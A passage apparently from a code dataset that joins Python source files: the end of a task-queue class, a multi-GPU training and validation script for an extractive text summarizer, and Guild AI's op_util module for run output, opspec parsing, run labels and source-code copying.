kwargs: The kwargs to pass to fn.
"""
if self.run_state == RunState.STOPPED:
raise ValueError('Start the task queue before submitting tasks.')
logger.info('Received task %s %s', task_id, delay)
time_to_run = time() + delay
args = args or ()
kwargs = kwargs or {}
with self.task_locks[task_id]:
self.tasks[task_id] += 1
task_version = self.tasks[task_id]
self.queue.put((time_to_run, (task_id, task_version, fn, args, kwargs)))
logger.info('Task queue size %s', self.queue.qsize())
def cancel_task(self, task_id: str):
"""Cancel a submitted task.
Args:
task_id: The task to cancel.
"""
logger.info('Cancel task %s', task_id)
with self.task_locks[task_id]:
self.tasks[task_id] += 1
|
train_extractive.py
|
#!/usr/bin/env python
"""
Main training workflow
"""
from __future__ import division
import argparse
import glob
import os
import random
import signal
import time
import torch
from distributed import multi_init
from models import data_loader, model_builder
from models.data_loader import load_dataset
from models.model_builder import ExtSummarizer
from models.trainer_ext import build_trainer
from others.logging import logger, init_logger
model_flags = ['hidden_size', 'ff_size', 'heads', 'inter_layers', 'encoder', 'ff_actv', 'use_interval', 'rnn_size']
def train_multi_ext(args):
""" Spawns 1 process per GPU """
init_logger()
nb_gpu = args.world_size
mp = torch.multiprocessing.get_context('spawn')
# Create a thread to listen for errors in the child processes.
error_queue = mp.SimpleQueue()
error_handler = ErrorHandler(error_queue)
# Train with multiprocessing.
procs = []
for i in range(nb_gpu):
device_id = i
procs.append(mp.Process(target=run, args=(args,
device_id, error_queue,), daemon=True))
procs[i].start()
logger.info(" Starting process pid: %d " % procs[i].pid)
error_handler.add_child(procs[i].pid)
for p in procs:
p.join()
def run(args, device_id, error_queue):
""" run process """
setattr(args, 'gpu_ranks', [int(i) for i in args.gpu_ranks])
try:
gpu_rank = multi_init(device_id, args.world_size, args.gpu_ranks)
print('gpu_rank %d' % gpu_rank)
if gpu_rank != args.gpu_ranks[device_id]:
raise AssertionError("An error occurred in \
Distributed initialization")
train_single_ext(args, device_id)
except KeyboardInterrupt:
pass # killed by parent, do nothing
except Exception:
# propagate exception to parent process, keeping original traceback
import traceback
error_queue.put((args.gpu_ranks[device_id], traceback.format_exc()))
class ErrorHandler(object):
"""A class that listens for exceptions in children processes and propagates
the tracebacks to the parent process."""
def __init__(self, error_queue):
""" init error handler """
import signal
import threading
self.error_queue = error_queue
self.children_pids = []
self.error_thread = threading.Thread(
target=self.error_listener, daemon=True)
self.error_thread.start()
signal.signal(signal.SIGUSR1, self.signal_handler)
def add_child(self, pid):
""" error handler """
self.children_pids.append(pid)
def error_listener(self):
""" error listener """
(rank, original_trace) = self.error_queue.get()
self.error_queue.put((rank, original_trace))
os.kill(os.getpid(), signal.SIGUSR1)
def signal_handler(self, signalnum, stackframe):
""" signal handler """
for pid in self.children_pids:
os.kill(pid, signal.SIGINT) # kill children processes
(rank, original_trace) = self.error_queue.get()
msg = """\n\n-- Tracebacks above this line can probably
be ignored --\n\n"""
msg += original_trace
raise Exception(msg)
def validate_ext(args, device_id):
timestep = 0
if (args.test_all):
cp_files = sorted(glob.glob(os.path.join(args.model_path, 'model_step_*.pt')))
cp_files.sort(key=os.path.getmtime)
xent_lst = []
for i, cp in enumerate(cp_files):
step = int(cp.split('.')[-2].split('_')[-1])
xent = validate(args, device_id, cp, step)
xent_lst.append((xent, cp))
max_step = xent_lst.index(min(xent_lst))
if (i - max_step > 10):
break
xent_lst = sorted(xent_lst, key=lambda x: x[0])[:3]
logger.info('PPL %s' % str(xent_lst))
for xent, cp in xent_lst:
step = int(cp.split('.')[-2].split('_')[-1])
test_ext(args, device_id, cp, step)
else:
while (True):
cp_files = sorted(glob.glob(os.path.join(args.model_path, 'model_step_*.pt')))
cp_files.sort(key=os.path.getmtime)
if (cp_files):
# print(cp_files)
cp = cp_files[-1]
time_of_cp = os.path.getmtime(cp)
if (not os.path.getsize(cp) > 0):
time.sleep(60)
continue
if (time_of_cp > timestep):
timestep = time_of_cp
step = int(cp.split('.')[-2].split('_')[-1])
# print('validating')
validate(args, device_id, cp, step)
test_ext(args, device_id, cp, step)
cp_files = sorted(glob.glob(os.path.join(args.model_path, 'model_step_*.pt')))
cp_files.sort(key=os.path.getmtime)
if (cp_files):
cp = cp_files[-1]
time_of_cp = os.path.getmtime(cp)
if (time_of_cp > timestep):
continue
else:
print('sleeping...')
time.sleep(300)
def validate(args, device_id, pt, step):
device = "cpu" if args.visible_gpus == '-1' else "cuda"
if (pt != ''):
test_from = pt
else:
test_from = args.test_from
logger.info('Loading checkpoint from %s' % test_from)
checkpoint = torch.load(test_from, map_location=lambda storage, loc: storage)
opt = vars(checkpoint['opt'])
for k in opt.keys():
if (k in model_flags):
setattr(args, k, opt[k])
print(args)
model = ExtSummarizer(args, device, checkpoint)
model.eval()
valid_iter = data_loader.Dataloader(args, load_dataset(args, 'valid', shuffle=False),
args.batch_size, device,
shuffle=False, is_test=False)
trainer = build_trainer(args, device_id, model, None)
stats = trainer.validate(valid_iter, step)
return stats.xent()
def test_ext(args, device_id, pt, step):
device = "cpu" if args.visible_gpus == '-1' else "cuda"
if (pt != ''):
test_from = pt
else:
test_from = args.test_from
logger.info('Loading checkpoint from %s' % test_from)
checkpoint = torch.load(test_from, map_location=lambda storage, loc: storage)
opt = vars(checkpoint['opt'])
for k in opt.keys():
if (k in model_flags):
setattr(args, k, opt[k])
print(args)
model = ExtSummarizer(args, device, checkpoint)
model.eval()
test_iter = data_loader.Dataloader(args, load_dataset(args, 'test', shuffle=False),
args.test_batch_size, device,
shuffle=False, is_test=True)
trainer = build_trainer(args, device_id, model, None)
trainer.test(test_iter, step)
def train_ext(args, device_id):
if (args.world_size > 1):
train_multi_ext(args)
else:
#print('here1')
train_single_ext(args, device_id)
def train_single_ext(args, device_id):
init_logger(args.log_file)
device = "cpu" if args.visible_gpus == '-1' else "cuda"
logger.info('Device ID %d' % device_id)
logger.info('Device %s' % device)
torch.manual_seed(args.seed)
random.seed(args.seed)
torch.backends.cudnn.deterministic = True
if device_id >= 0:
torch.cuda.set_device(device_id)
torch.cuda.manual_seed(args.seed)
torch.manual_seed(args.seed)
random.seed(args.seed)
torch.backends.cudnn.deterministic = True
if args.train_from != '':
logger.info('Loading checkpoint from %s' % args.train_from)
checkpoint = torch.load(args.train_from, map_location=lambda storage, loc: storage)
if 'opt' in checkpoint:
opt = vars(checkpoint['opt'])
for k in opt.keys():
if (k in model_flags):
setattr(args, k, opt[k])
else:
checkpoint = None
def train_iter_fct():
return data_loader.Dataloader(args, load_dataset(args, 'train', shuffle=True), args.batch_size, device,
shuffle=True, is_test=False)
model = ExtSummarizer(args, device, checkpoint)
optim = model_builder.build_optim(args, model, checkpoint)
logger.info(model)
trainer = build_trainer(args, device_id, model, optim)
trainer.train(train_iter_fct, args.train_steps)
|
op_util.py
|
# Copyright 2017-2020 TensorHub, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import
from __future__ import division
import csv
import importlib
import io
import logging
import os
import re
import struct
import sys
import threading
import time
import six
import yaml
from guild import config
from guild import guildfile
from guild import file_util
from guild import flag_util
from guild import log as loglib
from guild import op_cmd as op_cmd_lib
from guild import op_dep
from guild import run as runlib
from guild import util
from guild import var
from guild import vcs_util
log = logging.getLogger("guild")
MAX_DEFAULT_SOURCECODE_FILE_SIZE = 1024 * 1024
MAX_DEFAULT_SOURCECODE_COUNT = 100
DEFAULT_EXEC = "${python_exe} -um guild.op_main ${main_args} -- ${flag_args}"
STEPS_EXEC = "${python_exe} -um guild.steps_main"
LABEL_TOKENS_P = re.compile(r"(\${.+?})")
LABEL_FLAG_REF_P = re.compile(r"\${(.+?)}")
RUN_OUTPUT_STREAM_BUFFER = 4096
RESTART_NEEDED_STATUS = ("pending",)
DEFAULT_PROC_POLL_INTERVAL = 5
DEFAULT_PROC_KILL_DELAY = 30
try:
bytes('')
except TypeError:
# Python 3
LF = 10
BYTES_JOIN = bytes
else:
# Python 2
LF = b"\n"
BYTES_JOIN = lambda l: b"".join(l)
###################################################################
# Error classes
###################################################################
class ArgValueError(ValueError):
def __init__(self, arg):
super(ArgValueError, self).__init__(arg)
self.arg = arg
class FlagError(Exception):
pass
class MissingRequiredFlags(FlagError):
def __init__(self, missing):
super(MissingRequiredFlags, self).__init__(missing)
self.missing = missing
class InvalidFlagChoice(FlagError):
def __init__(self, val, flag):
super(InvalidFlagChoice, self).__init__(val, flag)
self.val = val
self.flag = flag
class InvalidFlagValue(FlagError):
def __init__(self, value, flag, msg):
super(InvalidFlagValue, self).__init__(value, flag, msg)
self.value = value
self.flag = flag
self.msg = msg
class OpDefLookupError(LookupError):
pass
class InvalidOpSpec(OpDefLookupError):
def __init__(self, opspec):
super(InvalidOpSpec, self).__init__(opspec)
self.opspec = opspec
class NoSuchModel(OpDefLookupError):
def __init__(self, opspec):
super(NoSuchModel, self).__init__(opspec)
self.opspec = opspec
class NoSuchOperation(OpDefLookupError):
def __init__(self, model, op_name):
super(NoSuchOperation, self).__init__(model, op_name)
self.model = model
self.op_name = op_name
class CwdGuildfileError(OpDefLookupError):
def __init__(self, guildfile_error):
super(CwdGuildfileError, self).__init__(guildfile_error)
self.msg = guildfile_error.msg
self.path = guildfile_error.path
class MultipleMatchingModels(OpDefLookupError):
def __init__(self, model_ref, matches):
super(MultipleMatchingModels, self).__init__(model_ref, matches)
self.model_ref = model_ref
self.matches = matches
class NoMatchingModel(OpDefLookupError):
def __init__(self, model_ref):
super(NoMatchingModel, self).__init__(model_ref)
self.model_ref = model_ref
class ModelOpProxyError(Exception):
def __init__(self, opspec, msg):
super(ModelOpProxyError, self).__init__(opspec, msg)
self.opspec = opspec
self.msg = msg
class NoSuchFlagError(FlagError):
def __init__(self, flag_name):
super(NoSuchFlagError, self).__init__(flag_name)
self.flag_name = flag_name
class InvalidOpDef(ValueError):
def __init__(self, opdef, msg):
super(InvalidOpDef, self).__init__(opdef, msg)
self.opdef = opdef
self.msg = msg
def __str__(self):
return "invalid definition for %s: %s" % (self.opdef.fullname, self.msg)
class OpCmdError(Exception):
pass
class BatchFileError(Exception):
def __init__(self, path, msg):
super(BatchFileError, self).__init__(path, msg)
self.path = path
self.msg = msg
def __str__(self):
return "cannot read trials for %s: %s" % (self.path, self.msg)
class ProcessError(Exception):
pass
###################################################################
# Run output
###################################################################
class RunOutput(object):
DEFAULT_WAIT_TIMEOUT = 10
def __init__(self, run, quiet=False, output_cb=None):
"""Creates a run output object.
Run output is not automatically opened. Use `open(proc)` to
open output for a process.
"""
assert run
self._run = run
self._quiet = quiet
self._output_cb = output_cb
self._output_lock = threading.Lock()
self._open = False
self._proc = None
self._output = None
self._index = None
self._out_tee = None
self._err_tee = None
@property
def closed(self):
return not self._open
def open(self, proc):
"""Opens output.
When open, threads are started for reading from proc.stdout
and proc.stderr and writing to sys.stdout and sys.stderr
respectively.
Generates an error if run output is closed.
"""
self._assert_closed()
if proc.stdout is None:
raise RuntimeError("proc stdout must be a PIPE")
if proc.stderr is None:
raise RuntimeError("proc stderr must be a PIPE")
self._proc = proc
self._output = self._open_output()
self._index = self._open_index()
self._out_tee = threading.Thread(target=self._out_tee_run)
self._err_tee = threading.Thread(target=self._err_tee_run)
self._out_tee.start()
self._err_tee.start()
self._open = True
def _assert_closed(self):
if self._open:
raise RuntimeError("already open")
assert self._proc is None
assert self._output is None
assert self._index is None
assert self._out_tee is None
assert self._err_tee is None
def _open_output(self):
path = self._run.guild_path("output")
return open(path, "wb")
def _open_index(self):
path = self._run.guild_path("output.index")
return open(path, "wb")
def _out_tee_run(self):
assert self._proc
self._gen_tee_run(self._proc.stdout, sys.stdout, 0)
def _err_tee_run(self):
assert self._proc
self._gen_tee_run(self._proc.stderr, sys.stderr, 1)
def _gen_tee_run(self, input_stream, output_stream, stream_type):
assert self._output
assert self._index
os_read = os.read
os_write = os.write
input_fileno = input_stream.fileno()
if not self._quiet and hasattr(output_stream, "fileno"):
try:
stream_fileno = output_stream.fileno()
except io.UnsupportedOperation:
stream_fileno = None
else:
stream_fileno = None
output_fileno = self._output.fileno()
index_fileno = self._index.fileno()
time_ = time.time
lock = self._output_lock
line = []
while True:
buf = os_read(input_fileno, RUN_OUTPUT_STREAM_BUFFER)
if not buf:
break
with lock:
if stream_fileno is not None:
os_write(stream_fileno, buf)
os_write(output_fileno, buf)
for b in buf:
if b < 9: # non-printable
continue
line.append(b)
if b == LF:
line_bytes = BYTES_JOIN(line)
del line[:]
entry = struct.pack("!QB", int(time_() * 1000), stream_type)
os_write(index_fileno, entry)
if self._output_cb:
try:
self._output_cb.write(line_bytes)
except Exception:
log.exception(
"error in output callback (will be " "removed)"
)
self._output_cb = None
def wait(self, timeout=DEFAULT_WAIT_TIMEOUT):
self._assert_open()
self._out_tee.join(timeout)
self._err_tee.join(timeout)
def _assert_open(self):
if not self._open:
raise RuntimeError("not open")
assert self._proc
assert self._output
assert self._index
assert self._out_tee
assert self._err_tee
def close(self):
lock = self._acquire_output_lock()
try:
self._close()
finally:
lock.release()
def _acquire_output_lock(self, timeout=60):
"""Polling verison of acquire to support timeouts on Python 2."""
timeout_at = time.time() + timeout
while time.time() < timeout_at:
if self._output_lock.acquire(False):
return self._output_lock
time.sleep(1)
raise RuntimeError("timeout")
def _close(self):
self._assert_open()
self._output.close()
self._index.close()
if self._output_cb:
try:
self._output_cb.close()
except Exception:
log.exception("closing output callback")
assert not self._out_tee.is_alive()
assert not self._err_tee.is_alive()
self._proc = None
self._output = None
self._index = None
self._out_tee = None
self._err_tee = None
self._open = False
def wait_and_close(self, timeout=DEFAULT_WAIT_TIMEOUT):
self.wait(timeout)
self.close()
###################################################################
# OpDef for spec
###################################################################
def opdef_for_opspec(opspec):
try:
return _model_opdef(opspec)
except OpDefLookupError:
opdef = _try_model_proxy(opspec)
if not opdef:
raise
return opdef
def _model_opdef(opspec):
model, op_name = _model_op(opspec)
opdef = _opdef_for_model_op(model, op_name)
if not opdef:
raise NoSuchOperation(model, op_name)
opdef.set_modelref(model.reference)
return opdef
def _try_model_proxy(opspec):
from guild import model_proxy
if not opspec:
return None
try:
model, op_name = model_proxy.resolve_model_op(opspec)
except model_proxy.NotSupported:
return None
except model_proxy.OpSpecError as e:
raise ModelOpProxyError(opspec, str(e))
else:
opdef = model.modeldef.get_operation(op_name)
if opdef:
opdef.set_modelref(model.reference)
return opdef
def _model_op(opspec):
model_ref, op_name = _parsed_opspec(opspec)
model = _resolve_model(model_ref)
if not model:
raise NoSuchModel(opspec)
return model, op_name
def _parsed_opspec(opspec):
parsed = parse_opspec(opspec)
if parsed is None:
raise InvalidOpSpec(opspec)
return parsed
###################################################################
# Opdef for model paths
###################################################################
def opdef_model_paths(opdef):
return _opdef_paths(opdef) + _model_parent_paths(opdef.modeldef)
def _opdef_paths(opdef):
if not opdef.guildfile.dir:
return []
abs_gf_dir = os.path.abspath(opdef.guildfile.dir)
if opdef.python_path is not None:
return [os.path.join(abs_gf_dir, p) for p in opdef.python_path]
if opdef.sourcecode and opdef.sourcecode.root:
return [os.path.join(abs_gf_dir, opdef.sourcecode.root)]
return [abs_gf_dir]
def _model_parent_paths(modeldef):
return [os.path.abspath(parent.dir) for parent in modeldef.parents]
###################################################################
# Parse opspec
###################################################################
def parse_opspec(spec):
return util.find_apply(
[
_empty_spec,
_op_spec,
_model_op_spec,
_package_model_op_spec,
_package_op_spec,
],
spec,
)
def _empty_spec(spec):
if spec:
return None
return None, None
def _op_spec(spec):
if "/" in spec or ":" in spec:
return None
return None, spec
def _model_op_spec(spec):
m = re.match(r"([^/:]*):([^/:]+)$", spec)
if not m:
return None
return m.groups()
def _package_model_op_spec(spec):
m = re.match(r"([^/:]+/[^/:?]+):([^/:]+)$", spec)
if not m:
return None
return m.groups()
def _package_op_spec(spec):
m = re.match(r"([^/:]+/):?([^/:]+)$", spec)
if not m:
return None
return m.groups()
def _resolve_model(model_ref):
return util.find_apply(
[
_resolve_cwd_model,
_resolve_system_model,
],
model_ref,
)
def _resolve_cwd_model(model_ref):
from guild import model as modellib # expensive
cwd_guildfile = _cwd_guildfile()
if not cwd_guildfile:
return None
with modellib.SetPath([cwd_guildfile.dir], clear_cache=True):
return _match_one_model(model_ref, cwd_guildfile)
def _cwd_guildfile():
try:
return guildfile.for_dir(config.cwd())
except guildfile.NoModels as e:
return None
except guildfile.GuildfileError as e:
raise CwdGuildfileError(e)
def _resolve_system_model(model_ref):
return _match_one_model(model_ref)
def _match_one_model(model_ref, cwd_guildfile=None):
matches = list(_iter_matching_models(model_ref, cwd_guildfile))
if len(matches) == 1:
return matches[0]
if len(matches) > 0 and model_ref:
return _complete_match_one_model(model_ref, matches)
return None
def _iter_matching_models(model_ref, cwd_guildfile):
from guild import model as modellib # expensive
for model in modellib.iter_models():
if model_ref:
if _match_model_ref(model_ref, model):
yield model
else:
if cwd_guildfile and _is_default_cwd_model(model, cwd_guildfile):
yield model
break
if not model.name:
yield model
def _is_default_cwd_model(model, cwd_guildfile):
default_model = cwd_guildfile.default_model
return (
default_model
and default_model.guildfile.dir == model.modeldef.guildfile.dir
and default_model.name == model.name
)
def _match_model_ref(model_ref, model):
if "/" in model_ref:
return model_ref in model.fullname
else:
return model_ref in model.name
def _complete_match_one_model(model_ref, matches):
complete_match = _model_by_name(model_ref, matches)
if complete_match:
return complete_match
raise MultipleMatchingModels(model_ref, matches)
def _model_by_name(name, models):
for model in models:
if model.name == name:
return model
return None
def _maybe_no_model_error(model_ref):
if model_ref:
raise NoMatchingModel(model_ref)
return None
def _opdef_for_model_op(model, op_name):
if op_name:
return model.modeldef.get_operation(op_name)
return model.modeldef.default_operation
###################################################################
# Run support
###################################################################
def init_run(path=None):
if not path:
run_id = runlib.mkid()
path = os.path.join(var.runs_dir(), run_id)
else:
run_id = os.path.basename(path)
return runlib.Run(run_id, path)
def set_run_marker(run, marker):
open(run.guild_path(marker), "w").close()
def clear_run_marker(run, marker):
util.ensure_deleted(run.guild_path(marker))
def set_run_pending(run):
set_run_marker(run, "PENDING")
def clear_run_pending(run):
clear_run_marker(run, "PENDING")
def write_sourcecode_digest(run, sourcecode_root):
src = os.path.join(run.dir, sourcecode_root)
digest = file_util.files_digest(src)
run.write_attr("sourcecode_digest", digest)
def write_vcs_commit(opdef, run):
if not opdef.guildfile.dir:
return
try:
commit, status = vcs_util.commit_for_dir(opdef.guildfile.dir)
except vcs_util.NoCommit:
pass
except vcs_util.CommitReadError as e:
log.warning("error reading VCS commit: %s", e)
else:
run.write_attr("vcs_commit", _format_vcs_commit(commit, status))
def _format_vcs_commit(commit, status):
if status:
return commit + "*"
return commit
def set_run_started(run):
started = runlib.timestamp()
run.write_attr("started", started)
def set_run_staged(run):
set_run_marker(run, "STAGED")
clear_run_pending(run)
set_run_started(run)
###################################################################
# Run labels
###################################################################
def run_label(label_template, flag_vals):
"""Returns a run label for template and flag vals."""
default_label = _default_run_label(flag_vals)
if not label_template:
return default_label
return _render_label_template(label_template, flag_vals, default_label)
def _default_run_label(flag_vals):
"""Returns a default run label for a map of flag values.
The default label is a string containing flag assign as NAME=VALUE.
"""
non_null = {name: val for name, val in flag_vals.items() if val is not None}
return " ".join(
flag_util.flag_assigns(non_null, truncate_floats=True, shorten_paths=True)
)
def _render_label_template(label_template, flag_vals, default_label):
"""Returns a rendered label template.
`label_template` is a string containing flag references. Flag
references are resolved with values defined in `flag_values.`
`default_label` is provided as an additional supported value,
which may be referenced using the name 'default_label' in the
template.
"""
formatted_vals = _render_template_formatted_vals(flag_vals, default_label)
return _render_label_template_formatted(label_template, formatted_vals)
def _render_template_formatted_vals(flag_vals, default_label):
formatted_vals = {
"default_label": default_label,
}
formatted_vals.update(
{
name: FormattedValue(val)
for name, val in flag_vals.items()
if val is not None
}
)
return formatted_vals
class FormattedValue(object):
def __init__(self, value):
self._value = value
self._str = None
@property
def wrapped_value(self):
return self._value
@wrapped_value.setter
def wrapped_value(self, value):
self._value = value
self._str = None
def __str__(self):
if self._str is None:
self._str = flag_util.format_flag(
self._value, truncate_floats=True, shorten_paths=True
)
return self._str
def _render_label_template_formatted(label_template, formatted_vals):
"""Renders a label template with formatted values.
`formatted_vals` is a map of names to formatted values. A
formatted value is a value wrapped as a `FormattedValue` instance.
This function supports value filters in form
``${NAME|FILTER:ARG1,ARG2}``, which require values to be be
wrapped with `FormattedValue`.
"""
tokens = LABEL_TOKENS_P.split(label_template)
return "".join([_rendered_str(_render_token(t, formatted_vals)) for t in tokens])
def _render_token(token, vals):
m = LABEL_FLAG_REF_P.match(token)
if not m:
return token
ref_parts = m.group(1).split("|")
name = ref_parts[0]
transforms = ref_parts[1:]
val = vals.get(name)
for t in transforms:
val = _apply_template_transform(t, val)
return val
def _apply_template_transform(t, val):
if hasattr(val, "wrapped_value"):
val = val.wrapped_value
parts = t.split(":", 1)
if len(parts) == 1:
name, arg = parts[0], None
else:
name, arg = parts
if name[:1] == "%":
return _t_python_format(val, name)
elif name == "default":
return _t_default(val, arg)
elif name == "basename":
if arg:
log.warning("ignoring argment to baseline in %r", t)
return _t_basename(val)
elif name == "unquote":
return _t_unquote(val)
else:
log.warning("unsupported template transform: %r", t)
return "#error#"
def _t_python_format(val, fmt):
try:
return fmt % val
except ValueError as e:
log.warning("error formatting %r with %r: %s", val, fmt, e)
return val
except TypeError:
# Silently ignore type errors. ValueErrors (logged above)
# indicate an invalid formatting string, which is of
# interest. Running into an unexpected value type should let
# that value pass through.
return val
def _t_default(val, arg):
if val is None:
return arg or ""
return val
def _t_basename(val):
if not val:
return ""
return os.path.basename(util.strip_trailing_sep(val))
def _t_unquote(val):
if (
isinstance(val, six.string_types)
and len(val) >= 2
and val[0] == "'"
and val[-1] == "'"
):
return val[1:-1]
return val
def _rendered_str(s):
if s is None:
return ""
return str(s)
###################################################################
# Source code support
###################################################################
def sourcecode_select_for_opdef(opdef):
root = _opdef_sourcecode_root(opdef)
rules = _select_rules_for_opdef(opdef)
return file_util.FileSelect(root, rules)
def _opdef_sourcecode_root(opdef):
return opdef.sourcecode.root or opdef.modeldef.sourcecode.root
def _select_rules_for_opdef(opdef):
if _sourcecode_disabled(opdef):
return [file_util.exclude("*")]
root = _opdef_select_rules_root(opdef)
return (
_base_sourcecode_select_rules()
+ _sourcecode_config_rules(opdef.modeldef.sourcecode, root)
+ _sourcecode_config_rules(opdef.sourcecode, root)
)
def _opdef_select_rules_root(opdef):
root_base = opdef.guildfile.dir
sourcecode_root = opdef_sourcecode_root(opdef)
if not sourcecode_root:
return root_base
return os.path.join(root_base, sourcecode_root)
def _sourcecode_disabled(opdef):
op_config = opdef.sourcecode
model_config = opdef.modeldef.sourcecode
return op_config.disabled or model_config.disabled and not op_config.specs
def opdef_sourcecode_root(opdef):
return opdef.sourcecode.root or opdef.modeldef.sourcecode.root
def _base_sourcecode_select_rules():
return [
_rule_exclude_pycache_dirs(),
_rule_exclude_dot_dirs(),
_rule_exclude_nocopy_dirs(),
_rule_exclude_venv_dirs(),
_rule_exclude_build_dirs(),
_rule_exclude_egg_info_dirs(),
_rule_include_limited_text_files(),
]
def _rule_exclude_pycache_dirs():
return file_util.exclude("__pycache__", type="dir")
def _rule_exclude_dot_dirs():
return file_util.exclude(".*", type="dir")
def _rule_exclude_nocopy_dirs():
return file_util.exclude("*", type="dir", sentinel=".guild-nocopy")
def _rule_exclude_venv_dirs():
return file_util.exclude("*", type="dir", sentinel="bin/activate")
def _rule_exclude_build_dirs():
return file_util.exclude("build", type="dir")
def _rule_exclude_egg_info_dirs():
return file_util.exclude("*.egg-info", type="dir")
def _rule_include_limited_text_files():
return file_util.include(
"*",
type="text",
size_lt=MAX_DEFAULT_SOURCECODE_FILE_SIZE + 1,
max_matches=MAX_DEFAULT_SOURCECODE_COUNT,
)
def _sourcecode_config_rules(config, root):
return [_rule_for_select_spec(spec, root) for spec in config.specs]
def _rule_for_select_spec(spec, root):
if spec.type == "include":
return _file_util_rule(file_util.include, spec, root)
elif spec.type == "exclude":
return _file_util_rule(file_util.exclude, spec, root)
else:
assert False, spec.type
def _file_util_rule(rule_f, spec, root):
patterns = _spec_patterns(spec, root)
return rule_f(patterns, type=spec.patterns_type)
def _spec_patterns(spec, root):
"""Returns patterns for spec.
If spec patterns_type is not specified, applies glob to and
existing patterns that reference directories relative to root. For
example, if a pattern is 'foo' and root is '/' and the directory
'/foo' exists, the pattern is returned as 'foo/*'. This is a
convenience so that un-globbed directories match all files as a
user might expect.
"""
if spec.patterns_type:
return spec.patterns
return [_apply_dir_glob(root, p) for p in spec.patterns]
def _apply_dir_glob(root, pattern):
if os.path.isdir(os.path.join(root, pattern)):
pattern = os.path.join(pattern, "*")
return pattern
def copy_sourcecode(sourcecode_src, sourcecode_select, dest_dir, handler_cls=None):
handler_cls = handler_cls or SourceCodeCopyHandler
file_util.copytree(
dest_dir, sourcecode_select, sourcecode_src, handler_cls=handler_cls
)
class SourceCodeCopyHandler(file_util.FileCopyHandler):
"""Handler to log warnings when soure code files are skipped.
Only logs warnings when the default rules are in effect.
"""
_warned_max_matches = False
_warning_help_suffix = (
" To control which files are copied, define 'sourcecode' "
"for the operation in a Guild file."
)
def ignore(self, path, rule_results):
fullpath = os.path.join(self.src_root, path)
if self._default_rules_in_effect(rule_results):
assert len(rule_results) == 1, rule_results
(_path, failed_test), _rule = rule_results[0]
if failed_test.name == "max matches":
self._warn_max_matches()
elif failed_test.name == "size":
self._warn_max_size(fullpath)
@staticmethod
def _default_rules_in_effect(results):
return (
len(results) == 1
and results[0][1].result is True
and results[0][1].size_lt == MAX_DEFAULT_SOURCECODE_FILE_SIZE + 1
and results[0][1].max_matches == MAX_DEFAULT_SOURCECODE_COUNT
)
def _warn_max_matches(self):
if self._warned_max_matches:
return
log.warning(
"Found more than %i source code files but will only "
"copy %i as a safety measure.%s",
MAX_DEFAULT_SOURCECODE_COUNT,
MAX_DEFAULT_SOURCECODE_COUNT,
self._warning_help_suffix,
)
self._warned_max_matches = True
def _warn_max_size(self, path):
log.warning(
"Skipping potential source code file %s because it's " "too big.%s",
path,
self._warning_help_suffix,
)
###################################################################
# Op command support
###################################################################
def op_cmd_for_opdef(opdef, extra_cmd_env=None):
"""Returns tuple of op cmd for opdef and associated run attrs.
Some operations require additional information from the opdef,
which is returned as the second element of the two-tuple.
"""
cmd_args, run_attrs = _op_cmd_args_and_run_attrs(opdef)
cmd_env = _op_cmd_env(opdef, extra_cmd_env or {})
cmd_flags = _op_cmd_flags(opdef)
cmd_flags_dest = opdef.flags_dest or "args"
op_cmd = op_cmd_lib.OpCmd(cmd_args, cmd_env, cmd_flags, cmd_flags_dest)
return op_cmd, run_attrs
def _op_cmd_args_and_run_attrs(opdef):
main_args = split_cmd(opdef.main or "")
exec_str, run_attrs = _opdef_exec_and_run_attrs(opdef)
exec_args = split_cmd(exec_str)
_apply_main_args(main_args, exec_args)
_apply_flag_args_marker(exec_args)
return exec_args, run_attrs
def split_cmd(cmd):
if isinstance(cmd, list):
return cmd
return util.shlex_split(cmd or "")
def _opdef_exec_and_run_attrs(opdef):
"""Returns exec template for opdef with required run attrs for opdef.
If exec is specified explicitly, it's returned, otherwise main or
steps are used to generate a template.
"""
if opdef.exec_:
if opdef.main:
log.warning(
"operation 'exec' and 'main' both specified, " "ignoring 'main'"
)
if opdef.steps:
log.warning(
"operation 'exec' and 'steps' both specified, " "ignoring 'steps'"
)
return opdef.exec_, None
elif opdef.main:
if opdef.steps:
log.warning(
"operation 'main' and 'steps' both specified, " "ignoring 'steps'"
)
return DEFAULT_EXEC, None
elif opdef.steps:
return STEPS_EXEC, _run_attrs_for_steps(opdef)
else:
raise InvalidOpDef(opdef, "must define either exec, main, or steps")
def _run_attrs_for_steps(opdef):
return {
"steps": opdef.steps,
}
def _apply_main_args(main_args, exec_args):
i = 0
while i < len(exec_args):
if exec_args[i] == "${main_args}":
exec_args[i : i + 1] = main_args
i += len(main_args)
i += 1
def _apply_flag_args_marker(exec_args):
for i, val in enumerate(exec_args):
if val == "${flag_args}":
exec_args[i] = "__flag_args__"
def _op_cmd_env(opdef, extra_env):
env = dict(opdef.env or {})
env.update(extra_env or {})
env["GUILD_PLUGINS"] = _op_plugins(opdef)
env["PROJECT_DIR"] = opdef.guildfile.dir or ""
if opdef.flags_dest:
env["FLAGS_DEST"] = opdef.flags_dest
if opdef.handle_keyboard_interrupt:
env["HANDLE_KEYBOARD_INTERRUPT"] = "1"
return env
def _op_plugins(opdef):
from guild import plugin as pluginlib # expensive
project_plugins = _project_plugins(opdef)
op_plugins = []
for name, plugin in pluginlib.iter_plugins():
if not _plugin_selected(plugin, project_plugins):
log.debug("plugin '%s' not configured for operation", name)
continue
enabled, reason = plugin.enabled_for_op(opdef)
if not enabled:
log.debug(
"plugin '%s' configured for operation but cannot be enabled%s",
name,
" (%s)" % reason if reason else "",
)
continue
log.debug(
"plugin '%s' enabled for operation%s",
name,
" (%s)" % reason if reason else "",
)
op_plugins.append(name)
return ",".join(sorted(op_plugins))
def _project_plugins(opdef):
if opdef.plugins is not None:
return opdef.plugins or []
return opdef.modeldef.plugins or []
def _plugin_selected(plugin, selected):
for name in selected:
if name == plugin.name or name in plugin.provides:
return True
return False
def _op_cmd_flags(opdef):
return {flagdef.name: _flag_cmd_for_flagdef(flagdef) for flagdef in opdef.flags}
def _flag_cmd_for_flagdef(flagdef):
return op_cmd_lib.CmdFlag(
arg_name=flagdef.arg_name,
arg_skip=_flagdef_arg_skip(flagdef),
arg_switch=flagdef.arg_switch,
env_name=flagdef.env_name,
)
